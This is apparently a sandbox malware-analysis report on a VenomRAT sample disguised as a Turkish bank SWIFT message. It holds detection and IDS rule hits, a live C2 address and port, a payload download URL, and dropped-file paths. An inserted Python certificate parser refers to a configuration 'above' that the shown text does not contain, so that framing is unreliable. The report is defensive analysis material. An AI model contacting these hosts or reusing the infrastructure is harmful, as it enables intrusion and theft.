Source: C:\Users\user\AppData\Roaming\NotepadUpdate.exe | ReversingLabs: Detection: 26%
Source: C:\Users\user\AppData\Roaming\regasms.exe | ReversingLabs: Detection: 26%
Source: Ziraat Bankasi Swift Mesaji.dqy.dll | ReversingLabs: Detection: 36%
Source: C:\Users\user\AppData\Roaming\regasms.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\NotepadUpdate.exe | Joe Sandbox ML: detected
Source: Ziraat Bankasi Swift Mesaji.dqy.dll | Joe Sandbox ML: detected
Source: unknown | HTTPS traffic detected: 163.44.198.57:443 -> 192.168.2.7:49700 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 163.44.198.57:443 -> 192.168.2.7:49701 version: TLS 1.2
Source: Binary string: NVBx.pdb | source: regasms.exe, 0000000D.00000000.1359680511.0000000000352000.00000002.00000001.01000000.00000006.sdmp, regasms.exe, 00000014.00000002.1543912182.0000000003A06000.00000004.00000800.00020000.00000000.sdmp, regasms.exe.5.dr, AtkzppDHiyvcIR.exe.13.dr, NotepadUpdate.exe.20.dr
Source: Binary string: NVBx.pdbSHA256V- | source: regasms.exe, 0000000D.00000000.1359680511.0000000000352000.00000002.00000001.01000000.00000006.sdmp, regasms.exe, 00000014.00000002.1543912182.0000000003A06000.00000004.00000800.00020000.00000000.sdmp, regasms.exe.5.dr, AtkzppDHiyvcIR.exe.13.dr, NotepadUpdate.exe.20.dr
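The extracted configuration above carries the C2 server's TLS certificate as base64 DER. What follows is an added example, not from the report and not the RAT's or any library's code: a stdlib-only Python DER walker that takes that exact certificate string and pulls out the fields a defender pivots on in TLS logs (issuer and subject RDNs, validity window, serial, signature algorithm, RSA key size). The function names are mine; the certificate bytes are copied verbatim from the extracted configuration.

```python
import base64
from datetime import datetime

# Base64 DER certificate copied verbatim from the VenomRAT configuration extracted above.
VENOMRAT_CERT_B64 = (
    "MIICOTCCAaKgAwIBAgIVAPyfwFFMs6hxoSr1U5gHJmBruaj1MA0GCSqGSIb3DQEBDQUAMGoxGDAW"
    "BgNVBAMMD1Zlbm9tUkFUIFNlcnZlcjETMBEGA1UECwwKcXdxZGFuY2h1bjEfMB0GA1UECgwWVmVu"
    "b21SQVQgQnkgcXdxZGFuY2h1bjELMAkGA1UEBwwCU0gxCzAJBgNVBAYTAkNOMB4XDTIyMDgxNDA5"
    "NDEwOVoXDTMzMDUyMzA5NDEwOVowEzERMA8GA1UEAwwIVmVub21SQVQwgZ8wDQYJKoZIhvcNAQEB"
    "BQADgY0AMIGJAoGBAJMk9aXYluIabmb8kV7b5XTizjGIK0IH5qWN260bNCSIKNt2zQOLq6jGfh+V"
    "vAA/ddzW3TGyxBUMbya8CatcEPCCiU4SEc8xjyE/n8+O0uya4p8g4ooTRIrNFHrRVySKchyTv32r"
    "ce963WWvmj+qDvwUHHkEY+Dsjf46C40vWLDxAgMBAAGjMjAwMB0GA1UdDgQWBBQsonRhlv8vx7fd"
    "xs/nJE8fsLDixjAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4GBAAVFFK4iQZ7aqDrU"
    "wV6nj3VoXFOcHVo+g9p9ikiXT8DjC2iQioCrN3cN4+w7YOkjPDL+fP3A7v+EI9z1lwEHgAqFPY7t"
    "F7sT9JEFtq/+XPM9bgDZnh4o1EWLq7Zdm66whSYsGIPR8wJdtjw6U396lrRHe6ODtIGB/JXyYYId"
    "aVrz"
)

# Attribute-type OIDs that occur in X.509 distinguished names.
OID_NAMES = {"2.5.4.3": "CN", "2.5.4.6": "C", "2.5.4.7": "L",
             "2.5.4.10": "O", "2.5.4.11": "OU"}
OID_RSA_ENCRYPTION = "1.2.840.113549.1.1.1"


def read_tlv(buf: bytes, pos: int):
    """Read one DER tag-length-value element at pos; return (tag, value, next_pos)."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                       # long form: low 7 bits count the length octets
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length


def children(body: bytes):
    """Split the body of a constructed element into its (tag, value) children."""
    out, pos = [], 0
    while pos < len(body):
        tag, value, pos = read_tlv(body, pos)
        out.append((tag, value))
    return out


def decode_oid(raw: bytes) -> str:
    """Dotted-decimal form of a DER-encoded OBJECT IDENTIFIER body."""
    arcs, acc = [raw[0] // 40, raw[0] % 40], 0
    for b in raw[1:]:
        acc = (acc << 7) | (b & 0x7F)
        if not b & 0x80:                    # last base-128 digit of this arc
            arcs.append(acc)
            acc = 0
    return ".".join(map(str, arcs))


def parse_name(body: bytes) -> dict:
    """X.501 Name ::= SEQUENCE OF SET OF SEQUENCE { type OID, value }."""
    rdns = {}
    for _, rdn_set in children(body):
        for _, atv in children(rdn_set):
            (_, oid_raw), (_, value) = children(atv)
            oid = decode_oid(oid_raw)
            rdns[OID_NAMES.get(oid, oid)] = value.decode("utf-8", "replace")
    return rdns


def utc_time(raw: bytes) -> str:
    """UTCTime 'YYMMDDhhmmssZ' -> ISO 8601 (strptime maps YY below 69 to 20YY)."""
    return datetime.strptime(raw.decode(), "%y%m%d%H%M%SZ").isoformat()


def parse_cert_identity(der: bytes) -> dict:
    _, cert, _ = read_tlv(der, 0)                 # Certificate ::= SEQUENCE
    _, tbs, _ = read_tlv(cert, 0)                 # tbsCertificate ::= SEQUENCE
    f = children(tbs)
    i = 1 if f[0][0] == 0xA0 else 0               # optional [0] EXPLICIT version
    serial, sig_alg = f[i][1], children(f[i + 1][1])[0][1]
    not_before, not_after = (v for _, v in children(f[i + 3][1]))
    # subjectPublicKeyInfo ::= SEQUENCE { algorithm, subjectPublicKey BIT STRING }
    (_, alg), (_, bitstr) = children(f[i + 5][1])
    key_bits = None
    if decode_oid(children(alg)[0][1]) == OID_RSA_ENCRYPTION:
        (_, modulus), _ = children(children(bitstr[1:])[0][1])   # bitstr[0] is the unused-bits octet
        key_bits = len(modulus.lstrip(b"\x00")) * 8
    return {
        "serial": serial.hex(),
        "signature_algorithm": decode_oid(sig_alg),
        "issuer": parse_name(f[i + 2][1]),
        "subject": parse_name(f[i + 4][1]),
        "not_before": utc_time(not_before),
        "not_after": utc_time(not_after),
        "rsa_key_bits": key_bits,
    }


def venomrat_cert_info() -> dict:
    """Identity fields of the certificate embedded in this sample's configuration."""
    return parse_cert_identity(base64.b64decode(VENOMRAT_CERT_B64))


if __name__ == "__main__":
    for key, value in venomrat_cert_info().items():
        print(f"{key}: {value}")
```

Run against the string above, the issuer decodes to CN=VenomRAT Server, OU=qwqdanchun, O=VenomRAT By qwqdanchun, L=SH, C=CN, the subject to CN=VenomRAT, the validity window to 2022-08-14 through 2033-05-23, and the key to RSA-1024 signed with sha512WithRSAEncryption (OID 1.2.840.113549.1.1.13). A self-signed, decade-long certificate with fixed tooling strings in its names is exactly the kind of static artefact a certificate-matching IDS signature keys on, which is consistent with the SSL-certificate alerts logged under Networking firing at the handshake on port 4449.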

Networking

Source: Network traffic | Suricata IDS: 2842478 - Severity 1 - ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s) : 185.208.158.187:4449 -> 192.168.2.7:49756
Source: Network traffic | Suricata IDS: 2052265 - Severity 1 - ET MALWARE Observed Malicious SSL Cert (VenomRAT) : 185.208.158.187:4449 -> 192.168.2.7:49756
Source: Network traffic | Suricata IDS: 2052267 - Severity 1 - ET MALWARE Observed Malicious SSL Cert (VenomRAT) : 185.208.158.187:4449 -> 192.168.2.7:49756
Source: C:\Windows\System32\rundll32.exe | Network Connect: 163.44.198.57 443
Source: global traffic | TCP traffic: 192.168.2.7:49756 -> 185.208.158.187:4449
Source: global traffic | HTTP traffic detected: GET /EpWHRWboolCJUXe.exe HTTP/1.1 | Connection: Keep-Alive | Host: 52575815-38-20200406120634.webstarterz.com
Source: global traffic | HTTP traffic detected: GET /EpWHRWboolCJUXe.exe HTTP/1.1 | Connection: Keep-Alive | Host: 52575815-38-20200406120634.webstarterz.com
Source: Joe Sandbox View | ASN Name: SIMPLECARRER2IT SIMPLECARRER2IT
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49700 -> 163.44.198.57:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49701 -> 163.44.198.57:443
Source: unknown | TCP traffic detected without corresponding DNS query: 185.208.158.187 (this entry is repeated 50 times)
                  Source: global traffic | HTTP traffic detected: GET /EpWHRWboolCJUXe.exe HTTP/1.1 Connection: Keep-Alive Host: 52575815-38-20200406120634.webstarterz.com (2 identical entries)
                  Source: global traffic | DNS traffic detected: DNS query: 52575815-38-20200406120634.webstarterz.com
                  Source: rundll32.exe, 00000005.00000002.1365084163.0000022E795B8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.1392563958.0000025438D63000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.1392563958.0000025438CD7000.00000004.00000020.00020000.00000000.sdmp, regasms.exe, 00000014.00000002.1543912182.0000000003A06000.00000004.00000800.00020000.00000000.sdmp, regasms.exe.5.dr, AtkzppDHiyvcIR.exe.13.dr, NotepadUpdate.exe.20.dr | String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                  Source: rundll32.exe, 00000005.00000002.1364433339.000000344ECEB000.00000004.00000010.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.1365084163.0000022E795B8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.1392342926.000000FEF1D3B000.00000004.00000010.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.1392563958.0000025438D63000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.1392563958.0000025438CD7000.00000004.00000020.00020000.00000000.sdmp, regasms.exe, 00000014.00000002.1543912182.0000000003A06000.00000004.00000800.00020000.00000000.sdmp, regasms.exe.5.dr, AtkzppDHiyvcIR.exe.13.dr, NotepadUpdate.exe.20.dr | String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
                  Source: regasms.exe, 0000001B.00000002.3741895347.000000000578F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                  Source: regasms.exe, 0000001B.00000002.3741895347.000000000578F000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.27.dr | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                  Source: rundll32.exe, 00000005.00000002.1364433339.000000344ECEB000.00000004.00000010.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.1365084163.0000022E795B8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.1392342926.000000FEF1D3B000.00000004.00000010.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.1392563958.0000025438D63000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.1392563958.0000025438CD7000.00000004.00000020.00020000.00000000.sdmp, regasms.exe, 00000014.00000002.1543912182.0000000003A06000.00000004.00000800.00020000.00000000.sdmp, regasms.exe.5.dr, AtkzppDHiyvcIR.exe.13.dr, NotepadUpdate.exe.20.dr | String found in binary or memory: http://ocsp.comodoca.com0
                  Source: regasms.exe, 0000000D.00000002.1403401343.00000000027D1000.00000004.00000800.00020000.00000000.sdmp, regasms.exe, 0000000F.00000002.1440771055.0000000003121000.00000004.00000800.00020000.00000000.sdmp, regasms.exe, 00000014.00000002.1535778393.0000000002C5D000.00000004.00000800.00020000.00000000.sdmp, AtkzppDHiyvcIR.exe, 00000015.00000002.1540173205.0000000002851000.00000004.00000800.00020000.00000000.sdmp, regasms.exe, 0000001B.00000002.3725431578.00000000033EE000.00000004.00000800.00020000.00000000.sdmp, regasms.exe, 0000001B.00000002.3725431578.0000000003133000.00000004.00000800.00020000.00000000.sdmp, NotepadUpdate.exe, 00000028.00000002.1574426924.0000000003141000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: rundll32.exe, 00000005.00000002.1365084163.0000022E795E2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.1392563958.0000025438CD7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://52575815-38-20200406120634.webstarterz.com/
                  Source: rundll32.exe, 00000005.00000002.1365084163.0000022E7960C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.1365084163.0000022E795B8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.1392563958.0000025438CB8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.1392563958.0000025438D0C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://52575815-38-20200406120634.webstarterz.com/EpWHRWboolCJUXe.exe
                  Source: rundll32.exe, 00000005.00000002.1365084163.0000022E795E2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.1392563958.0000025438CE2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://52575815-38-20200406120634.webstarterz.com:443/EpWHRWboolCJUXe.exe
                  Source: rundll32.exe, 00000005.00000002.1365084163.0000022E79661000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.1364433339.000000344ECEB000.00000004.00000010.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.1365084163.0000022E795B8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.1392342926.000000FEF1D3B000.00000004.00000010.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.1392563958.0000025438D63000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.1392563958.0000025438CD7000.00000004.00000020.00020000.00000000.sdmp, regasms.exe, 00000014.00000002.1543912182.0000000003A06000.00000004.00000800.00020000.00000000.sdmp, regasms.exe.5.dr, AtkzppDHiyvcIR.exe.13.dr, NotepadUpdate.exe.20.dr | String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49700
                  Source: unknown | Network traffic detected: HTTP traffic on port 49700 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 49701 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49701
                  Source: unknown | HTTPS traffic detected: 163.44.198.57:443 -> 192.168.2.7:49700 version: TLS 1.2
                  Source: unknown | HTTPS traffic detected: 163.44.198.57:443 -> 192.168.2.7:49701 version: TLS 1.2

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  Source: Yara match | File source: 15.2.regasms.exe.3230128.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 13.2.regasms.exe.28be350.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 13.2.regasms.exe.28d0c2c.1.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 21.2.AtkzppDHiyvcIR.exe.2937300.1.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 15.2.regasms.exe.321d84c.1.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 21.2.AtkzppDHiyvcIR.exe.2949bdc.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 13.2.regasms.exe.28d0c2c.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 20.2.regasms.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 13.2.regasms.exe.28be350.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 15.2.regasms.exe.3230128.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 15.2.regasms.exe.321d84c.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 21.2.AtkzppDHiyvcIR.exe.2949bdc.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 21.2.AtkzppDHiyvcIR.exe.2937300.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0000000D.00000002.1403401343.0000000002827000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000014.00000002.1519769182.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000000F.00000002.1440771055.0000000003217000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000015.00000002.1540173205.0000000002935000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: regasms.exe PID: 6696, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: regasms.exe PID: 7260, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: AtkzppDHiyvcIR.exe PID: 7628, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: regasms.exe PID: 7464, type: MEMORYSTR
                  Source: 13.2.regasms.exe.28be350.0.raw.unpack, Keylogger.cs | .Net Code: KeyboardLayout
                  Source: 13.2.regasms.exe.28d0c2c.1.raw.unpack, Keylogger.cs | .Net Code: KeyboardLayout
                  Source: 15.2.regasms.exe.321d84c.1.raw.unpack, Keylogger.cs | .Net Code: KeyboardLayout
                  Source: 15.2.regasms.exe.3230128.0.raw.unpack, Keylogger.cs | .Net Code: KeyboardLayout

                  System Summary

                  Source: 15.2.regasms.exe.3230128.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                  Source: 13.2.regasms.exe.28be350.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                  Source: 13.2.regasms.exe.28d0c2c.1.unpack, type: UNPACKEDPE | Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                  Source: 21.2.AtkzppDHiyvcIR.exe.2937300.1.unpack, type: UNPACKEDPE | Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                  Source: 15.2.regasms.exe.321d84c.1.unpack, type: UNPACKEDPE | Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                  Source: 21.2.AtkzppDHiyvcIR.exe.2949bdc.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                  Source: 13.2.regasms.exe.28d0c2c.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                  Source: 20.2.regasms.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                  Source: 13.2.regasms.exe.28be350.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                  Source: 15.2.regasms.exe.3230128.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                  Source: 15.2.regasms.exe.321d84c.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                  Source: 21.2.AtkzppDHiyvcIR.exe.2949bdc.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                  Source: 21.2.AtkzppDHiyvcIR.exe.2937300.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                  Source: C:\Users\user\AppData\Roaming\regasms.exe | Code function: 20_2_00FA32C8 NtProtectVirtualMemory
                  Source: C:\Users\user\AppData\Roaming\regasms.exe | Code function: 20_2_00FA2E73 NtProtectVirtualMemory
                  Source: C:\Users\user\AppData\Roaming\regasms.exe | Code function: 27_2_030F32D0 NtProtectVirtualMemory
                  Source: C:\Users\user\AppData\Roaming\regasms.exe | Code function: 27_2_030F2E7A NtProtectVirtualMemory
                  Source: C:\Users\user\AppData\Roaming\regasms.exe | Code function: 27_2_030F3397 NtProtectVirtualMemory
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe | Code function: 32_2_00F732D0 NtProtectVirtualMemory
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe | Code function: 32_2_00F72E7A NtProtectVirtualMemory
                  Source: C:\Users\user\AppData\Roaming\regasms.exe | Code function: 13_2_00A13E34
                  Source: C:\Users\user\AppData\Roaming\regasms.exe | Code function: 13_2_00A1E124
                  Source: C:\Users\user\AppData\Roaming\regasms.exe | Code function: 13_2_00A16F90
                  Source: C:\Users\user\AppData\Roaming\regasms.exe | Code function: 13_2_05850BD4
                  Source: C:\Users\user\AppData\Roaming\regasms.exe | Code function: 13_2_058576A8
                  Source: C:\Users\user\AppData\Roaming\regasms.exe | Code function: 13_2_05850120
                  Source: C:\Users\user\AppData\Roaming\regasms.exe | Code function: 13_2_05850130
                  Source: C:\Users\user\AppData\Roaming\regasms.exe | Code function: 13_2_058520F0
                  Source: C:\Users\user\AppData\Roaming\regasms.exe | Code function: 13_2_05850BC8
                  Source: C:\Users\user\AppData\Roaming\regasms.exe | Code function: 13_2_0585769A
                  Source: C:\Users\user\AppData\Roaming\regasms.exe | Code function: 13_2_07226A80
                  Source: C:\Users\user\AppData\Roaming\regasms.exe | Code function: 13_2_0722A685
                  Source: C:\Users\user\AppData\Roaming\regasms.exe | Code function: 13_2_07224BB8
                  Source: C:\Users\user\AppData\Roaming\regasms.exe | Code function: 13_2_07224FE0
                  Source: C:\Users\user\AppData\Roaming\regasms.exe | Code function: 13_2_07224FF0
                  Source: C:\Users\user\AppData\Roaming\regasms.exe | Code function: 13_2_07226A71
                  Source: C:\Users\user\AppData\Roaming\regasms.exe | Code function: 13_2_07223918
                  Source: C:\Users\user\AppData\Roaming\regasms.exe | Code function: 13_2_072230A8
                  Source: C:\Users\user\AppData\Roaming\regasms.exe | Code function: 13_2_072234E0
                  Source: C:\Users\user\AppData\Roaming\regasms.exe | Code function: 13_2_08874117
                  Source: C:\Users\user\AppData\Roaming\regasms.exe | Code function: 13_2_08871240
                  Source: C:\Users\user\AppData\Roaming\regasms.exe | Code function: 13_2_08873668
                  Source: C:\Users\user\AppData\Roaming\regasms.exe | Code function: 13_2_08876D08
                  Source: C:\Users\user\AppData\Roaming\regasms.exe | Code function: 13_2_08871230
                  Source: C:\Users\user\AppData\Roaming\regasms.exe | Code function: 15_2_02F83E34
                  Source: C:\Users\user\AppData\Roaming\regasms.exe | Code function: 15_2_02F8E124
                  Source: C:\Users\user\AppData\Roaming\regasms.exe | Code function: 15_2_02F86F90
                  Source: C:\Users\user\AppData\Roaming\regasms.exe | Code function: 15_2_07DD6A10
                  Source: C:\Users\user\AppData\Roaming\regasms.exe | Code function: 15_2_07DD34E0
                  Source: C:\Users\user\AppData\Roaming\regasms.exe | Code function: 15_2_07DD30A8
                  Source: C:\Users\user\AppData\Roaming\regasms.exe | Code function: 15_2_07DD0007
                  Source: C:\Users\user\AppData\Roaming\regasms.exe | Code function: 15_2_07DD4FF0
                  Source: C:\Users\user\AppData\Roaming\regasms.exe | Code function: 15_2_07DD4FE0
                  Source: C:\Users\user\AppData\Roaming\regasms.exe | Code function: 15_2_07DD4BB8
                  Source: C:\Users\user\AppData\Roaming\regasms.exe | Code function: 15_2_07DD9ADF
                  Source: C:\Users\user\AppData\Roaming\regasms.exe | Code function: 15_2_07DD6A00
                  Source: C:\Users\user\AppData\Roaming\regasms.exe | Code function: 15_2_07DD3918
                  Source: C:\Users\user\AppData\Roaming\regasms.exe | Code function: 15_2_09284128
                  Source: C:\Users\user\AppData\Roaming\regasms.exe | Code function: 15_2_09281240
                  Source: C:\Users\user\AppData\Roaming\regasms.exe | Code function: 15_2_09283668
                  Source: C:\Users\user\AppData\Roaming\regasms.exe | Code function: 15_2_09281230
                  Source: C:\Users\user\AppData\Roaming\regasms.exe | Code function: 20_2_00FA26F8
                  Source: C:\Users\user\AppData\Roaming\regasms.exe | Code function: 20_2_00FA26E7
                  Source: C:\Users\user\AppData\Roaming\regasms.exe | Code function: 20_2_00FA2E73
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe | Code function: 21_2_00B93E34
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe | Code function: 21_2_00B9E124
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe | Code function: 21_2_00B96F90
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe | Code function: 21_2_07123668
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe | Code function: 21_2_07121240
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe | Code function: 21_2_07124117
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe | Code function: 21_2_07121230
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe | Code function: 21_2_07126D08
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe | Code function: 21_2_07606A80
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe | Code function: 21_2_076099D5
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe | Code function: 21_2_07604FE0
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe | Code function: 21_2_07604FF0
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe | Code function: 21_2_076034E0
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe | Code function: 21_2_07604BB8
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe | Code function: 21_2_07606A70
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe | Code function: 21_2_07603918
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe | Code function: 21_2_07600006
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe | Code function: 21_2_076030A8
                  Source: C:\Users\user\AppData\Roaming\regasms.exe | Code function: 27_2_030F2700
                  Source: C:\Users\user\AppData\Roaming\regasms.exe | Code function: 27_2_030F26EF
                  Source: C:\Users\user\AppData\Roaming\regasms.exe | Code function: 27_2_030F2E7A
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe | Code function: 32_2_00F72700
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe | Code function: 32_2_00F726EF
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe | Code function: 32_2_00F72E7A
                  Source: C:\Users\user\AppData\Roaming\NotepadUpdate.exe | Code function: 40_2_01473E34
                  Source: C:\Users\user\AppData\Roaming\NotepadUpdate.exe | Code function: 40_2_0147E124
                  Source: C:\Users\user\AppData\Roaming\NotepadUpdate.exe | Code function: 40_2_01474B01
                  Source: C:\Users\user\AppData\Roaming\NotepadUpdate.exe | Code function: 40_2_01476F90
                  Source: C:\Users\user\AppData\Roaming\NotepadUpdate.exe | Code function: 40_2_062C0BD4
                  Source: C:\Users\user\AppData\Roaming\NotepadUpdate.exe | Code function: 40_2_062C76A8
                  Source: C:\Users\user\AppData\Roaming\NotepadUpdate.exe | Code function: 40_2_062C20F0
                  Source: C:\Users\user\AppData\Roaming\NotepadUpdate.exe | Code function: 40_2_062C0120
                  Source: C:\Users\user\AppData\Roaming\NotepadUpdate.exe | Code function: 40_2_062C0130
                  Source: C:\Users\user\AppData\Roaming\NotepadUpdate.exe | Code function: 40_2_062C769B
                  Source: C:\Users\user\AppData\Roaming\NotepadUpdate.exe | Code function: 40_2_092D61DD
                  Source: C:\Users\user\AppData\Roaming\NotepadUpdate.exe | Code function: 40_2_092D1240
                  Source: C:\Users\user\AppData\Roaming\NotepadUpdate.exe | Code function: 40_2_092D3668
                  Source: C:\Users\user\AppData\Roaming\NotepadUpdate.exe | Code function: 40_2_092D11F8
                  Source: C:\Users\user\AppData\Roaming\NotepadUpdate.exe | Code function: 40_2_092D1230
                  Source: Ziraat Bankasi Swift Mesaji.dqy.dll | Static PE information: Number of sections : 59 > 10
                  Source: 15.2.regasms.exe.3230128.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                  Source: 13.2.regasms.exe.28be350.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                  Source: 13.2.regasms.exe.28d0c2c.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                  Source: 21.2.AtkzppDHiyvcIR.exe.2937300.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                  Source: 15.2.regasms.exe.321d84c.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
